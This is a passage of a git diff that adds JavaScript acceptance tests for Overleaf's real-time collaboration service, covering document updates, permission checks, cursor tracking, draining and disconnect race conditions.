"github:overleaf/socket.io-client#0.9.17-overleaf-5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cookie-signature": "^1.1.0", + "mocha": "^11.1.0", + "sandboxed-module": "~0.3.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "0.0.4", + "typescript": "^5.0.4", + "uid-safe": "^2.1.5" + } +} diff --git a/services/real-time/test/acceptance/js/ApplyUpdateTests.js b/services/real-time/test/acceptance/js/ApplyUpdateTests.js new file mode 100644 index 0000000..c3e47ed --- /dev/null +++ b/services/real-time/test/acceptance/js/ApplyUpdateTests.js @@ -0,0 +1,599 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS201: Simplify complex destructure assignments + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.documentupdater) + +const redisSettings = settings.redis + +const PENDING_UPDATES_LIST_KEYS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9].map(n => { + let key = 'pending-updates-list' + if (n !== 0) { + key += `-${n}` + } + return key +}) + +function getPendingUpdatesList(cb) { + Promise.all(PENDING_UPDATES_LIST_KEYS.map(key => rclient.lrange(key, 0, -1))) + .then(results => { + cb( + null, + results.reduce((acc, more) => { + if (more.length) { + acc.push(...more) + } + return acc + }, []) + ) + }) + .catch(cb) +} + +function clearPendingUpdatesList(cb) { + Promise.all(PENDING_UPDATES_LIST_KEYS.map(key => rclient.del(key))) + .then(() => cb(null)) + .catch(cb) +} + +describe('applyOtUpdate', function () { + before(function () { + return (this.update = { + op: [{ i: 'foo', p: 42 }], + }) + }) + describe('when authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + cb + ) + }, + ], + done + ) + }) + + it('should push the doc into the pending updates list', function (done) { + getPendingUpdatesList((error, ...rest) => { + if (error) return done(error) + const [docId] = Array.from(rest[0]) + docId.should.equal(`${this.project_id}:${this.doc_id}`) + return done() + }) + return null + }) + + it('should push the update into redis', function (done) { + rclient.lrange( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + 0, + -1, + (error, ...rest) => { + if (error) return done(error) + let [update] = Array.from(rest[0]) + update = JSON.parse(update) + update.op.should.deep.equal(this.update.op) + update.meta.should.include({ + source: this.client.publicId, + user_id: this.user_id, + }) + return done() + } + ) + return null + }) + + return after(function (done) { + return async.series( + [ + cb => clearPendingUpdatesList(cb), + cb => + rclient.del( + 'DocsWithPendingUpdates', + `${this.project_id}:${this.doc_id}`, + cb + ), + cb => + rclient.del( + redisSettings.documentupdater.key_schema.pendingUpdates( + this.doc_id + ), + cb + ), + ], + done + ) + }) + }) + + describe('when authorized with a huge edit update', function () { + before(function (done) { + this.update = { + op: { + p: 12, + t: 'update is too large'.repeat(1024 * 400), // >7MB + }, + } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + return this.client.on('otUpdateError', otUpdateError => { + this.otUpdateError = otUpdateError + }) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should not return an error', function () { + return expect(this.error).to.not.exist + }) + + it('should send an otUpdateError to the client', function (done) { + return setTimeout(() => { + expect(this.otUpdateError).to.exist + return done() + }, 300) + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized to read-only with an edit update', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized to read-only with a comment update', function () { + before(function (done) { + this.comment_update = { + op: [{ c: 'foo', p: 42 }], + } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + this.comment_update, + cb + ) + }, + ], + done + ) + }) + + it('should push the doc into the pending updates list', function (done) { + getPendingUpdatesList((error, ...rest) => { + if (error) return done(error) + const [docId] = Array.from(rest[0]) + docId.should.equal(`${this.project_id}:${this.doc_id}`) + return done() + }) + return null + }) + + it('should push the update into redis', function (done) { + rclient.lrange( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + 0, + -1, + (error, ...rest) => { + if (error) return done(error) + let [update] = Array.from(rest[0]) + update = JSON.parse(update) + update.op.should.deep.equal(this.comment_update.op) + update.meta.should.include({ + source: this.client.publicId, + user_id: this.user_id, + }) + return done() + } + ) + return null + }) + + return after(function (done) { + return async.series( + [ + cb => clearPendingUpdatesList(cb), + cb => + rclient.del( + 'DocsWithPendingUpdates', + `${this.project_id}:${this.doc_id}`, + cb + ), + cb => + rclient.del( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + cb + ), + ], + done + ) + }) + }) + + describe('when authorized with an edit update to an invalid doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + 'invalid-doc-id', + this.update, + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) + + describe('when authorized with an invalid edit update', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.client.emit( + 'applyOtUpdate', + this.doc_id, + 'invalid-update', + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return expect(this.error).to.exist + }) + + it('should disconnect the client', function (done) { + return setTimeout(() => { + this.client.socket.connected.should.equal(false) + return done() + }, 300) + }) + + return it('should not put the update in redis', function (done) { + rclient.llen( + redisSettings.documentupdater.key_schema.pendingUpdates({ + doc_id: this.doc_id, + }), + (error, len) => { + if (error) return done(error) + len.should.equal(0) + return done() + } + ) + return null + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ClientTrackingTests.js b/services/real-time/test/acceptance/js/ClientTrackingTests.js new file mode 100644 index 0000000..415e9ad --- /dev/null +++ b/services/real-time/test/acceptance/js/ClientTrackingTests.js @@ -0,0 +1,218 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('clientTracking', function () { + describe('when a client updates its cursor location', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.updates = [] + this.clientB.on('clientTracking.clientUpdated', data => { + return this.updates.push(data) + }) + + return this.clientA.emit( + 'clientTracking.updatePosition', + { + row: (this.row = 42), + column: (this.column = 36), + doc_id: this.doc_id, + }, + error => { + if (error != null) { + throw error + } + return setTimeout(cb, 300) + } + ) + }, // Give the message a chance to reach client B. + ], + done + ) + }) + + it('should tell other clients about the update', function () { + return this.updates.should.deep.equal([ + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + id: this.clientA.publicId, + user_id: this.user_id, + name: 'Joe Bloggs', + }, + ]) + }) + + return it('should record the update in getConnectedUsers', function (done) { + return this.clientB.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + for (const user of Array.from(users)) { + if (user.client_id === this.clientA.publicId) { + expect(user.cursorData).to.deep.equal({ + row: this.row, + column: this.column, + doc_id: this.doc_id, + }) + return done() + } + } + throw new Error('user was never found') + } + ) + }) + }) + + return describe('when an anonymous client updates its cursor location', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + publicAccess: 'readAndWrite', + }, + ( + error, + { user_id: userId, project_id: projectId, anonymousAccessToken } + ) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.anonymous = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.anonymous.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.updates = [] + this.clientA.on('clientTracking.clientUpdated', data => { + return this.updates.push(data) + }) + + return this.anonymous.emit( + 'clientTracking.updatePosition', + { + row: (this.row = 42), + column: (this.column = 36), + doc_id: this.doc_id, + }, + error => { + if (error != null) { + throw error + } + return setTimeout(cb, 300) + } + ) + }, // Give the message a chance to reach client B. + ], + done + ) + }) + + return it('should tell other clients about the update', function () { + return this.updates.should.deep.equal([ + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + id: this.anonymous.publicId, + user_id: 'anonymous-user', + name: '', + }, + ]) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/DrainManagerTests.js b/services/real-time/test/acceptance/js/DrainManagerTests.js new file mode 100644 index 0000000..99502e2 --- /dev/null +++ b/services/real-time/test/acceptance/js/DrainManagerTests.js @@ -0,0 +1,108 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const { expect } = require('chai') + +const async = require('async') +const request = require('request') + +const drain = function (rate, callback) { + request.post( + { + url: `http://127.0.0.1:3026/drain?rate=${rate}`, + }, + (error, response, data) => callback(error, data) + ) + return null +} + +describe('DrainManagerTests', function () { + before(function (done) { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return done() + } + ) + return null + }) + + before(function (done) { + // cleanup to speedup reconnecting + this.timeout(10000) + return RealTimeClient.disconnectAllClients(done) + }) + + // trigger and check cleanup + it('should have disconnected all previous clients', function (done) { + return RealTimeClient.getConnectedClients((error, data) => { + if (error) { + return done(error) + } + expect(data.length).to.equal(0) + return done() + }) + }) + + return describe('with two clients in the project', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + ], + done + ) + }) + + return describe('starting to drain', function () { + beforeEach(function (done) { + return async.parallel( + [ + cb => { + return this.clientA.on('reconnectGracefully', cb) + }, + cb => { + return this.clientB.on('reconnectGracefully', cb) + }, + + cb => drain(2, cb), + ], + done + ) + }) + + afterEach(function (done) { + return drain(0, done) + }) // reset drain + + it('should not timeout', function () { + return expect(true).to.equal(true) + }) + + return it('should not have disconnected', function () { + expect(this.clientA.socket.connected).to.equal(true) + return expect(this.clientB.socket.connected).to.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/EarlyDisconnect.js b/services/real-time/test/acceptance/js/EarlyDisconnect.js new file mode 100644 index 0000000..84c9f89 --- /dev/null +++ b/services/real-time/test/acceptance/js/EarlyDisconnect.js @@ -0,0 +1,265 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) +const rclientRT = redis.createClient(settings.redis.realtime) +const KeysRT = settings.redis.realtime.key_schema + +describe('EarlyDisconnect', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('when the client disconnects before joinProject completes', function () { + before(function () { + // slow down web-api requests to force the race condition + this.actualWebAPIjoinProject = MockWebServer.joinProject + MockWebServer.joinProject = (...args) => + setTimeout(() => this.actualWebAPIjoinProject(...args), 300) + }) + + after(function () { + return (MockWebServer.joinProject = this.actualWebAPIjoinProject) + }) + + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + // disconnect after the handshake and before joinProject completes + setTimeout(() => this.clientA.disconnect(), 100) + this.clientA.on('disconnect', () => cb()) + }, + + cb => { + // wait for joinDoc and subscribe + return setTimeout(cb, 500) + }, + ], + done + ) + }) + + // we can force the race condition, there is no need to repeat too often + return Array.from(Array.from({ length: 5 }).map((_, i) => i + 1)).map( + attempt => + it(`should not subscribe to the pub/sub channel anymore (race ${attempt})`, function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + ) + }) + + describe('when the client disconnects before joinDoc completes', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + // disconnect before joinDoc completes + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + // we can not force the race condition, so we have to try many times + return Array.from(Array.from({ length: 20 }).map((_, i) => i + 1)).map( + attempt => + it(`should not subscribe to the pub/sub channels anymore (race ${attempt})`, function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`editor-events:${this.project_id}`) + + return rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + }) + return null + }) + ) + }) + + return describe('when the client disconnects before clientTracking.updatePosition starts', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.clientA.emit( + 'clientTracking.updatePosition', + { + row: 42, + column: 36, + doc_id: this.doc_id, + }, + () => {} + ) + // disconnect before updateClientPosition completes + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // wait for updateClientPosition + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + // we can not force the race condition, so we have to try many times + return Array.from(Array.from({ length: 20 }).map((_, i) => i + 1)).map( + attempt => + it(`should not show the client as connected (race ${attempt})`, function (done) { + rclientRT.smembers( + KeysRT.clientsInProject({ project_id: this.project_id }), + (err, results) => { + if (err) { + return done(err) + } + expect(results).to.deep.equal([]) + return done() + } + ) + return null + }) + ) + }) +}) diff --git a/services/real-time/test/acceptance/js/HttpControllerTests.js b/services/real-time/test/acceptance/js/HttpControllerTests.js new file mode 100644 index 0000000..ce84b1a --- /dev/null +++ b/services/real-time/test/acceptance/js/HttpControllerTests.js @@ -0,0 +1,105 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') +const request = require('request').defaults({ + baseUrl: 'http://127.0.0.1:3026', +}) + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +describe('HttpControllerTests', function () { + describe('without a user', function () { + return it('should return 404 for the client view', function (done) { + const clientId = 'not-existing' + return request.get( + { + url: `/clients/${clientId}`, + json: true, + }, + (error, response, data) => { + if (error) { + return done(error) + } + expect(response.statusCode).to.equal(404) + return done() + } + ) + }) + }) + + return describe('with a user and after joining a project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (error, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + {}, + (error, { doc_id: docId }) => { + this.doc_id = docId + return cb(error) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + ], + done + ) + }) + + return it('should send a client view', function (done) { + return request.get( + { + url: `/clients/${this.client.socket.sessionid}`, + json: true, + }, + (error, response, data) => { + if (error) { + return done(error) + } + expect(response.statusCode).to.equal(200) + expect(data.connected_time).to.exist + delete data.connected_time + // .email is not set in the session + delete data.email + expect(data).to.deep.equal({ + client_id: this.client.socket.sessionid, + first_name: 'Joe', + last_name: 'Bloggs', + project_id: this.project_id, + user_id: this.user_id, + rooms: [this.project_id, this.doc_id], + }) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/JoinDocTests.js b/services/real-time/test/acceptance/js/JoinDocTests.js new file mode 100644 index 0000000..547691d --- /dev/null +++ b/services/real-time/test/acceptance/js/JoinDocTests.js @@ -0,0 +1,589 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('joinDoc', function () { + before(function () { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + return (this.ranges = { mock: 'ranges' }) + }) + + describe('when authorised readAndWrite', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorised readOnly', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorised as owner', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + // It is impossible to write an acceptance test to test joining an unauthorized + // project, since joinProject already catches that. If you can join a project, + // then you can join a doc in that project. + + describe('for an invalid doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + 'invalid-doc-id', + (error, ...rest) => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should not get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, 'invalid-doc-id') + .should.equal(false) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal('invalid id') + }) + + return it('should not have joined the doc room', function (done) { + return 